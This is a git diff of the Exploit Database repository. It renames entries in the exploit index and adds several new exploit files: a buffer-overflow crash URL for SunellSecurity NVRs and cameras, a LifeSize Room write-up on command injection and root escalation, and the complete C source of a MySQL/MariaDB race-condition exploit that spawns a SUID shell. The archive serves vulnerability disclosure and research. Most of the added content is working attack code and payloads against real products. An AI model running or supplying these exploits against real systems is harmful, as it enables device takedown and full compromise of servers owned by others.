-36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
+36863,platforms/php/webapps/36863.txt,"Joomla! Component 'com_machine' - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0
 36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
@@ -33580,8 +33579,8 @@ id,file,description,date,author,platform,type,port
 37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
-37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
-37102,platforms/php/webapps/37102.txt,"Joomla! Component Video Gallery - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
+37101,platforms/php/webapps/37101.txt,"Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
+37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
 37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
@@ -33822,13 +33821,13 @@ id,file,description,date,author,platform,type,port
 37371,platforms/php/webapps/37371.php,"WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0
 37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0
 37373,platforms/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37374,platforms/php/webapps/37374.txt,"Joomla! Component Alphacontent - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
-37375,platforms/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
+37374,platforms/php/webapps/37374.txt,"Joomla! Component 'com_alphacontent' - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
+37375,platforms/php/webapps/37375.php,"Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0
 37377,platforms/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
-37378,platforms/php/webapps/37378.php,"Joomla! Component Simple SWFupload - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37379,platforms/php/webapps/37379.php,"Joomla! Component Art Uploader - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
-37380,platforms/php/webapps/37380.php,"Joomla! Component DentroVideo - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
+37378,platforms/php/webapps/37378.php,"Joomla! Component 'com_simpleswfupload' - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
+37379,platforms/php/webapps/37379.php,"Joomla! Component 'mod_artuploader' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
+37380,platforms/php/webapps/37380.php,"Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
 37381,platforms/php/webapps/37381.html,"Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
 37382,platforms/php/webapps/37382.php,"Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
 37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
@@ -36299,7 +36298,7 @@ id,file,description,date,author,platform,type,port
 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80
 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
 40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
-39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21
+39999,platforms/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21
 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80
 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
@@ -36763,12 +36762,25 @@ id,file,description,date,author,platform,type,port
 40667,platforms/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",windows,dos,0
 40668,platforms/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",windows,dos,0
 40669,platforms/osx/local/40669.txt,"Apple MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0
-40670,platforms/windows/remote/40670.py,"PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0
+40670,platforms/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0
 40674,platforms/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow",2016-11-01,Ger,windows,remote,0
 40671,platforms/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps,0
 40672,platforms/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow",2016-11-01,Karri93,windows,remote,0
 40673,platforms/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow",2016-11-01,Cybernetic,windows,remote,0
 40675,platforms/windows/remote/40675.py,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)",2016-11-01,n30m1nd,windows,remote,0
 40677,platforms/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow",2016-11-01,Eagleblack,windows,remote,0
-40678,platforms/linux/local/40678.txt,"MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
-40679,platforms/linux/local/40679.txt,"MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
+40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
+40680,platforms/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow",2016-11-02,Eagleblack,windows,remote,0
+40681,platforms/windows/remote/40681.py,"Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow",2016-11-02,ScrR1pTK1dd13,windows,remote,0
+40682,platforms/php/webapps/40682.txt,"Alienvault OSSIM/USM 5.3.1 - PHP Object Injection",2016-11-02,"Peter Lapp",php,webapps,0
+40683,platforms/php/webapps/40683.txt,"Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting",2016-11-02,"Peter Lapp",php,webapps,0
+40684,platforms/php/webapps/40684.txt,"Alienvault OSSIM/USM 5.3.1 - SQL Injection",2016-11-02,"Peter Lapp",php,webapps,0
+40685,platforms/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,windows,dos,0
+40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
+40687,platforms/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial Of Service",2016-11-02,qwsj,hardware,dos,0
+40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
+40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
+40689,platforms/linux/remote/40689.rb,"Bassmaster 1.5.1 - Batch Arbitrary JavaScript Injection Remote Code Execution (Metasploit)",2016-11-02,Metasploit,linux,remote,0
+40690,platforms/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",hardware,webapps,0
+40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
+40692,platforms/php/webapps/40692.html,"SweetRice 1.5.1 - Cross-Site Request Forgery",2016-11-02,"Ashiyane Digital Security Team",php,webapps,0
diff --git a/platforms/hardware/dos/40687.txt b/platforms/hardware/dos/40687.txt
new file mode 100755
index 000000000..378e9e5bd
--- /dev/null
+++ b/platforms/hardware/dos/40687.txt
@@ -0,0 +1,28 @@
+# Exploit Title: SunellSecurity NVR / Cams - Buffer overflow in CGI
+# Date: 11.2.2016
+# Exploit Author: qwsj
+# Vendor Homepage: https://github.com/qwsj
+# Version: 1.6.08-09 / 2.0.06-08
+# Tested on: Windows / Linux
+
+Bug in CGI scrypt's for develop.
+Web service buffer overflow and leading to a stop web service, and the device rebooted.
+
+Symbols (1072): -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+# For NVR:
+Version firmware:
+1.6.0902.0000.3.0.29.0.0
+1.6.0802.0000.0.0.2906.1.0
+Use link: http://IP/cgi-bin/videoStream.cgi?userName=
+
+# For Cams:
+Version firmware:
+2.0.0601.1002.3.0.56.0.1_TD
+2.0.0801.1002.1.1.125.0.0
+2.0.0601.1002.3.0.33.0.12
+Use link: http://IP/cgi-bin/image.cgi?userName=
+
+# Eg: http://IP/cgi-bin/image.cgi?userName=-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ЯR qwsj 2016
\ No newline at end of file
diff --git a/platforms/hardware/webapps/40690.txt b/platforms/hardware/webapps/40690.txt
new file mode 100755
index 000000000..f08b7480e
--- /dev/null
+++ b/platforms/hardware/webapps/40690.txt
@@ -0,0 +1,84 @@
+Source: https://github.com/XiphosResearch/exploits/tree/master/deathsize
+
+LifeSize Room 5.0.9, remote config disclosure, code execution & local privilege escalation
+
+Ultimately the Lifesize Room products have fundamentally flawed firmware, many similar very bugs in the WebUI exist and thier support team have been recommending that port 443 isn't accessible via the internet.
+
+They've been alerted to several very similar bugs, and in some cases have fixed one gaping security hole only to leave another one literally 10 lines above completely untouched. facepalm
+
+What makes this different? This exploit will run your payload as root.
+
+Description
+
+This exploit uses the LsSystemRestore.sh script to disclose the current configuration, that is then leveraged to gain access to exploitable APIs in the admin portal which allow arbitrary command injection, then uses a local privilege escalation bug to execute the payload as root.
+
+This will work as long as port 443 is open on the phone, Lifesize support should recommend that the power and ethernet cables are disconnected from the device to ensure it remains secure.
+
+LsSystemRestore.sh allows autosh commands to be executed without any authentication, this is used to grab the Admin password via the get config -P command.
+
+Using the Admin password AMF commands can be sent to the LSRoom_Remoting endpoint, this contains a method called doPrefCommand which is vulnerable to command injection.
+
+function doPrefCommand($cmd, $id){
+
+        // Look for the existence of a "pref " and ";" needle.
+        $invalidCmd = $this->scrubPrefString($cmd);
+
+        if ( $invalidCmd )
+        {
+            return "invalid_command";
+        }
+
+        // If we get to here, we want to double check the command for
+        // any unwanted characters:  #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and "
+        //$cleanCommand = escapeshellcmd($cmd);
+
+        $prefData = array();
+        $value = rtrim(shell_exec($cmd));
+What's interesting here is that the escapeshellcmd function is commented out, this would have prevented the command injection, but all of the code on the firmware smells of barely competent development and least-effort attempts to patch security vulnerabilities.
+
+Local privilege escalation to root is gained by executing the setuid tcpdump_manager executable, which runs a program called reset_tcpdump using PATH to resolve its location using PATH=/tmp:$PATH tcpdump_manager
+
+Other exploits exist in the 'support' portal, providing command execution, for example in support/download_file.php:
+
+<html>
+<head>
+<?php
+print('
+</head>
+<body>
+<h1>Download File </h1>
+');
+
+$file_to_download=$_REQUEST['file_to_download'];
+{
+    print("<hr>\n");
+    shell_exec("rm tmp/tmp-file.tmp");
+        shell_exec("cp $file_to_download tmp/tmp-file.tmp");
+Usage
+
+$ deathsize.php 192.168.40.39 payload
+[*] Retrieving admin password
+[*] Saving config for 192.168.40.39
+[*] Admin password is: 1234
+[*] Authenticating for AMF RPC
+[*] Sending command: ...
+...
+This will save the configuration for the device into the local file 192.168.40.39.config and then execute the code in your payload file as root on the device and print out the response.
+
+Timeline
+
+13th June 2016 - Notified LifeSize of multiple vulnerabilities
+15th June - LifeSize start spamming my inbox with marketing messages
+16th June - Requested escallation, support requested demo
+22nd June - Telling LifeSize that no... just changing the password doesn't fix it
+30th June - Test device provided by support
+1st July - Owned their test device running latest firmware
+4th July - Support can't reproduce or understand exploit
+5th July - Engineering ticket created
+7th July - Support recommend adding firewall, sigh
+8th August - Provide PoC
+Have had no further contact with them, unable to get a CVE assigned for this, product will be EOL in January 2017, seems like there's no firmware update coming...
+
+
+Full Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40690.zip
diff --git a/platforms/linux/local/40678.c b/platforms/linux/local/40678.c
new file mode 100755
index 000000000..43db69e5c
--- /dev/null
+++ b/platforms/linux/local/40678.c
@@ -0,0 +1,273 @@
+/*
+
+Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
+
+MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
+mysql-privesc-race.c (ver. 1.0)
+
+CVE-2016-6663 / OCVE-2016-5616
+
+Discovered/Coded by:
+
+Dawid Golunski
+dawid[at]legalhackers.com
+https://legalhackers.com
+
+Follow https://twitter.com/dawid_golunski for updates on this advisory.
+
+
+Compile:
+gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
+
+Note:
+* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads)
+
+* For testing purposes only. Do no harm.  
+
+Full advisory URL:
+https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
+
+Video PoC:
+https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
+
+*/
+
+
+#include <fcntl.h>
+#include <grp.h>
+#include <mysql.h>
+#include <pwd.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/inotify.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <unistd.h>
+
+
+#define EXP_PATH          "/tmp/mysql_privesc_exploit"
+#define EXP_DIRN          "mysql_privesc_exploit"
+#define MYSQL_TAB_FILE    EXP_PATH "/exploit_table.MYD"
+#define MYSQL_TEMP_FILE   EXP_PATH "/exploit_table.TMD"
+
+#define SUID_SHELL   	  EXP_PATH "/mysql_suid_shell.MYD"
+
+#define MAX_DELAY 1000    // can be used in the race to adjust the timing if necessary
+
+MYSQL *conn;		  // DB handles
+MYSQL_RES *res;
+MYSQL_ROW row;
+
+unsigned long cnt;
+
+
+void intro() {
+
+printf( 
+        "\033[94m\n"
+        "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n"
+        "mysql-privesc-race.c (ver. 1.0)\n\n"
+        "CVE-2016-6663 / OCVE-2016-5616\n\n"
+        "For testing purposes only. Do no harm.\n\n"
+	"Discovered/Coded by:\n\n"
+	"Dawid Golunski \n"
+	"http://legalhackers.com"
+        "\033[0m\n\n");
+
+}
+
+void usage(char *argv0) {
+    intro();
+    printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
+}
+
+void mysql_cmd(char *sql_cmd, int silent) {
+    
+    if (!silent) {
+	    printf("%s \n", sql_cmd);
+    }
+    if (mysql_query(conn, sql_cmd)) {
+        fprintf(stderr, "%s\n", mysql_error(conn));
+        exit(1);
+    }
+    res = mysql_store_result(conn);
+    if (res>0) mysql_free_result(res);
+
+}
+
+
+int main(int argc,char **argv)
+{
+
+    int randomnum = 0;
+    int io_notified = 0;
+    int myd_handle;
+    int wpid;
+    int is_shell_suid=0;
+    pid_t pid;
+    int status;
+    struct stat st;
+    /* io notify */
+    int fd;
+    int ret;
+    char buf[4096] __attribute__((aligned(8)));
+    int num_read;
+    struct inotify_event *event;
+    /* credentials */
+    char *user     = argv[1];
+    char *password = argv[2];
+    char *db_host  = argv[3];
+    char *database = argv[4];
+
+
+    // Disable buffering of stdout
+    setvbuf(stdout, NULL, _IONBF, 0);
+
+    // Get the params
+    if (argc!=5) {
+	usage(argv[0]);
+	exit(1);
+    } 
+    intro();
+    // Show initial privileges
+    printf("\n[+] Starting the exploit as: \n");
+    system("id");
+
+    // Connect to the database server with provided credentials
+    printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
+    conn = mysql_init(NULL);
+    if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
+        fprintf(stderr, "%s\n", mysql_error(conn));
+        exit(1);
+    }
+
+    // Prepare tmp dir
+    printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
+    umask(000);
+    system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
+    system("chmod g+s /tmp/" EXP_DIRN );
+
+    // Prepare exploit tables :)
+    printf("\n[+] Creating mysql tables \n\n");
+    mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
+    mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
+    mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
+    mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
+
+    // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
+    // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
+    printf("\n[+] Copying bash into the mysql_suid_shell table.\n    After the exploitation the following file/table will be assigned SUID and executable bits : \n");
+    system("cp /bin/bash " SUID_SHELL);
+    system("ls -l " SUID_SHELL);
+
+    // Use inotify to get the timing right
+    fd = inotify_init();
+    if (fd < 0) {
+        printf("failed to inotify_init\n");
+        return -1;
+    }
+    ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);
+
+
+    /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
+
+    printf("\n[+] Entering the race loop... Hang in there...\n");
+
+    while ( is_shell_suid != 1 ) {
+
+        cnt++;
+	if ( (cnt % 100) == 0 ) {
+	 	printf("->");
+	 	//fflush(stdout);	
+	}
+
+        /* Create empty file , remove if already exists */
+        unlink(MYSQL_TEMP_FILE);
+        unlink(MYSQL_TAB_FILE);
+   	mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
+	mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);
+
+	/* random num if needed */
+        srand ( time(NULL) );
+        randomnum = ( rand() % MAX_DELAY );
+
+        // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
+        pid = fork();
+        if (pid < 0) {
+            fprintf(stderr, "Fork failed :(\n");
+        }
+
+        /* Child process - executes REPAIR TABLE  SQL statement */
+        if (pid == 0) {
+            usleep(500);
+            unlink(MYSQL_TEMP_FILE);
+	    mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
+            // child stops here
+            exit(0);
+        }
+
+        /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
+        if (pid > 0 ) {
+            io_notified = 0;
+
+            while (1) {
+                int processed = 0;
+                ret = read(fd, buf, sizeof(buf));
+                if (ret < 0) {
+                    break;
+                }
+                while (processed < ret) {
+                    event = (struct inotify_event *)(buf + processed);
+                    if (event->mask & IN_CLOSE) {
+                        if (!strcmp(event->name, "exploit_table.TMD")) {
+                            //usleep(randomnum);
+
+			    // Set the .MYD permissions to suid+exec before they get copied to the .TMD file 
+			    unlink(MYSQL_TAB_FILE);
+			    myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
+			    close(myd_handle);
+			    chmod(MYSQL_TAB_FILE, 04777);
+
+			    // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
+                            unlink(MYSQL_TEMP_FILE);
+                            symlink(SUID_SHELL, MYSQL_TEMP_FILE);
+                            io_notified=1;
+                        }
+                    }
+                    processed += sizeof(struct inotify_event);
+                }
+                if (io_notified) {
+                    break;
+                }
+            }
+
+
+            waitpid(pid, &status, 0);
+        }
+
+	// Check if SUID bit was set at the end of this attempt
+        if ( lstat(SUID_SHELL, &st) == 0 ) {
+	    if (st.st_mode & S_ISUID) {
+		is_shell_suid = 1;
+	    }
+        } 
+
+    }
+
+    printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
+    system("ls -l " SUID_SHELL);
+
+    printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n    Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
+    system(SUID_SHELL " -p -i ");
+    //system(SUID_SHELL " -p -c '/bin/bash -i -p'");
+
+    /* close MySQL connection and exit */
+    printf("\n[+] Job done. Exiting\n\n");
+    mysql_close(conn);
+    return 0;
+
+}
\ No newline at end of file
diff --git a/platforms/linux/local/40678.txt b/platforms/linux/local/40678.txt
deleted file mode 100755
index ae2a84ef9..000000000
--- a/platforms/linux/local/40678.txt
+++ /dev/null
@@ -1,765 +0,0 @@
-=============================================
-- Release date: 01.11.2016
-- Discovered by: Dawid Golunski
-- Severity: Critical
-- CVE-2016-6663 / OCVE-2016-5616
-- http://legalhackers.com
-=============================================
-
-
-I. VULNERABILITY
--------------------------
-
-MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition
-
-
-MariaDB 
-	< 5.5.52
-	< 10.1.18
-        < 10.0.28
-
-MySQL  
-	<= 5.5.51
-	<= 5.6.32
-	<= 5.7.14
-
-Percona Server
-	< 5.5.51-38.2
-	< 5.6.32-78-1
-	< 5.7.14-8
-
-Percona XtraDB Cluster
-	< 5.6.32-25.17
-	< 5.7.14-26.17
-	< 5.5.41-37.0
-
-
-II. BACKGROUND
--------------------------
-
-
-MySQL:
-
-"MySQL is the world's most popular open source database.
-Whether you are a fast growing web property, technology ISV or large
-enterprise, MySQL can cost-effectively help you deliver high performance,
-scalable database applications."
-
-"Many of the world's largest and fastest-growing organizations including
-Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time
-and money powering their high-volume Web sites, business-critical systems and
-packaged software."
-
-http://www.mysql.com/products/
-http://www.mysql.com/why-mysql/
-
---
-
-MariaDB:
